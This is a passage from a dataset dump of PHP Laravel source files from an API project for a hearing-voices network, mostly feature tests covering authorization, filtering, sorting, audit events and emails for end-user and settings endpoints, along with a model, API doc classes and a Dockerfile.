],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $response->assertJson([\n 'data' => [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_update(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->putJson('/v1/settings');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === 'Updated settings.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6756756901741028,
"alphanum_fraction": 0.6773648858070374,
"avg_line_length": 24.7391300201416,
"blob_id": "ce84416a2592d946f9746b09225e0eeb167857aa",
"content_id": "dd309318f4a1dd540ec202327162dc09b110312b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 592,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 23,
"path": "/app/Docs/Parameters/FilterParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\n\nclass FilterParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @param string $field\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(string $objectId = null, string $field = ''): BaseObject\n {\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name(\"filter[{$field}]\");\n }\n}\n"
},
{
"alpha_fraction": 0.663149356842041,
"alphanum_fraction": 0.6639610528945923,
"avg_line_length": 25.782608032226562,
"blob_id": "c10a2be223cbe3de168e62b37c931cb605b77b50",
"content_id": "7a1f40772a377e1a57be8a3aad87d09e1016110d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 46,
"path": "/app/Models/Admin.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse App\\Mail\\TemplateMail;\nuse App\\VariableSubstitution\\Email\\Admin\\PasswordResetSubstituter;\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\nuse Illuminate\\Support\\Arr;\n\nclass Admin extends Model\n{\n use Mutators\\AdminMutators;\n use Relationships\\AdminRelationships;\n use Scopes\\AdminScopes;\n use DispatchesJobs;\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * Send the password reset notification.\n *\n * @param string $token\n */\n public function sendPasswordResetNotification($token): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $passwordResetUrl = route('auth.admin.password.reset', ['token' => $token]);\n\n $this->dispatchNow(new TemplateMail(\n $this->user->email,\n Arr::get($emailContent, 'admin.password_reset.subject'),\n Arr::get($emailContent, 'admin.password_reset.body'),\n new PasswordResetSubstituter($this, $passwordResetUrl)\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.6024242639541626,
"alphanum_fraction": 0.6028282642364502,
"avg_line_length": 37.671875,
"blob_id": "ac8046c2ea0c694095c88120b5c5dfd9e2e5533e",
"content_id": "c75a91de4958b490ebf9e334c74d6ee8c6c5ecb5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2475,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 64,
"path": "/app/Docs/Operations/Admins/IndexAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Parameters\\FilterParameter;\nuse App\\Docs\\Parameters\\PageParameter;\nuse App\\Docs\\Parameters\\PerPageParameter;\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Admin\\AdminSchema;\nuse App\\Docs\\Schemas\\PaginationSchema;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all admins')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->parameters(\n PageParameter::create(),\n PerPageParameter::create(),\n FilterParameter::create(null, 'id')\n ->description('The IDs of the admins to filter by')\n ->schema(Schema::string())\n ->style(FilterParameter::STYLE_SIMPLE),\n FilterParameter::create(null, 'name')\n ->description('The name of the Admin to filter by')\n ->schema(Schema::string()),\n FilterParameter::create(null, 'email')\n ->description('The email of the Admin to filter by')\n ->schema(Schema::string()),\n FilterParameter::create(null, 'phone')\n ->description('The phone of the Admin to filter by')\n ->schema(Schema::string()),\n SortParameter::create(null, ['name', 'email', 'phone'], 'name')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n PaginationSchema::create(null, AdminSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7428571581840515,
"alphanum_fraction": 0.7591836452484131,
"avg_line_length": 21.272727966308594,
"blob_id": "c3e4a7b9be749295eb0b0c79c239eccf8aed8812",
"content_id": "763635259c9e25b7d702052c067e79bf0cecb8fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 245,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 11,
"path": "/docker/node/Dockerfile",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Set base image.\nFROM node:10.12\n\n# Set maintainer to Ayup Digital.\nLABEL maintainer=\"Ayup Digital\"\n\n# Install git for faster package downloads.\nRUN apt-get install -y git\n\n# Set the working directory to the project root.\nWORKDIR /var/www/html\n"
},
{
"alpha_fraction": 0.6096423268318176,
"alphanum_fraction": 0.6111975312232971,
"avg_line_length": 15.921052932739258,
"blob_id": "1b66f695a035f3509d4d1ffcaac7e28a9249fca3",
"content_id": "38bd8d8dea12b54ec212edd3c7f2330cda150f17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 643,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 38,
"path": "/app/Events/Export/ExportRequested.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Export;\n\nuse App\\Models\\Export;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass ExportRequested\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Export\n */\n protected $export;\n\n /**\n * ExportCreated constructor.\n *\n * @param \\App\\Models\\Export $export\n */\n public function __construct(Export $export)\n {\n $this->export = $export;\n }\n\n /**\n * @return \\App\\Models\\Export\n */\n public function getExport(): Export\n {\n return $this->export;\n }\n}\n"
},
{
"alpha_fraction": 0.4997623860836029,
"alphanum_fraction": 0.5076192021369934,
"avg_line_length": 30.65998077392578,
"blob_id": "90622aa4d174bd83ad83cee9a83bc69235d53dfc",
"content_id": "f4846bfb08b5484d8e3deb95ccef34243f00f946",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 31565,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 997,
"path": "/tests/Feature/V1/EndUserControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Notification;\nuse App\\Models\\Setting;\nuse App\\Models\\User;\nuse App\\VariableSubstitution\\Email\\Admin\\NewEndUserSubstituter;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Queue;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass EndUserControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n\n {\n factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $endUser->user->updated_at->toIso8601String(),\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create();\n $endUser2 = factory(EndUser::class)->create();\n $endUser3 = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users', [\n 'filter[id]' => \"{$endUser1->id},{$endUser2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n $response->assertJsonMissing(['id' => $endUser3->id]);\n }\n\n /** @test */\n public function can_filter_by_email_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users', [\n 'filter[email]' => '[email protected]',\n ]);\n\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonMissing(['id' => $endUser2->id]);\n }\n\n /** @test */\n public function can_filter_by_email_verified_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email_verified_at' => Date::now(),\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email_verified_at' => null,\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n // Only verified emails.\n $response = $this->getJson('/v1/end-users', [\n 'filter[email_verified]' => 'true',\n ]);\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonMissing(['id' => $endUser2->id]);\n\n // Only non-verified emails.\n $response = $this->getJson('/v1/end-users', [\n 'filter[email_verified]' => 'false',\n ]);\n $response->assertJsonMissing(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n\n // All end users, regardless of email verification status.\n $response = $this->getJson('/v1/end-users', [\n 'filter[email_verified]' => 'all',\n ]);\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n }\n\n /** @test */\n public function can_filter_by_with_soft_deletes_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'deleted_at' => Date::now(),\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'deleted_at' => null,\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n // Only soft deleted.\n $response = $this->getJson('/v1/end-users', [\n 'filter[with_soft_deletes]' => 'true',\n ]);\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n\n // Only active (default).\n $response = $this->getJson('/v1/end-users', [\n 'filter[with_soft_deletes]' => 'false',\n ]);\n $response->assertJsonMissing(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n }\n\n /** @test */\n public function can_sort_by_email_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ])->user\n );\n\n $response = $this->getJson('/v1/end-users', ['sort' => '-email']);\n\n $response->assertNthIdInCollection(0, $endUser1->id);\n $response->assertNthIdInCollection(1, $endUser2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/end-users');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all end users.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_can_store(): void\n {\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function end_user_cannot_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n $now = Date::now();\n Date::setTestNow($now);\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertJsonFragment([\n 'email' => '[email protected]',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $now->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $now->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $endUser = EndUser::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $endUser): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_admins_for_store(): void\n {\n Queue::fake();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === config('connecting_voices.admin_email')\n && $mail->getSubject() === Arr::get($emailContent, 'admin.new_end_user.subject')\n && $mail->getBody() === Arr::get($emailContent, 'admin.new_end_user.body')\n && $mail->getSubstituter() instanceof NewEndUserSubstituter;\n }\n );\n }\n\n /** @test */\n public function validation_error_given_when_email_belongs_to_soft_deleted_end_user(): void\n {\n $user = factory(User::class)->create([\n 'email' => '[email protected]',\n 'deleted_at' => Date::today(),\n ]);\n factory(EndUser::class)->create([\n 'user_id' => $user->id,\n ]);\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertJsonValidationErrors('email');\n $response->assertJsonFragment([\n 'errors' => [\n 'email' => [\n sprintf(\n 'The account has been withdrawn. Please contact the admin team via %s for more info.',\n config('connecting_voices.admin_email')\n ),\n ],\n ],\n ]);\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function guest_cannot_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_for_someone_else_cannot_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_for_them_self_can_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $endUser->user->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $endUser): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Update.\n */\n\n /** @test */\n public function guest_cannot_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_for_someone_else_cannot_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_for_them_self_can_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_cannot_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function structure_correct_for_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $now = Date::now();\n Date::setTestNow($now);\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => '[email protected]',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function only_password_can_be_provided_for_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $now = Date::now();\n Date::setTestNow($now);\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'gdpr_consented_at' => 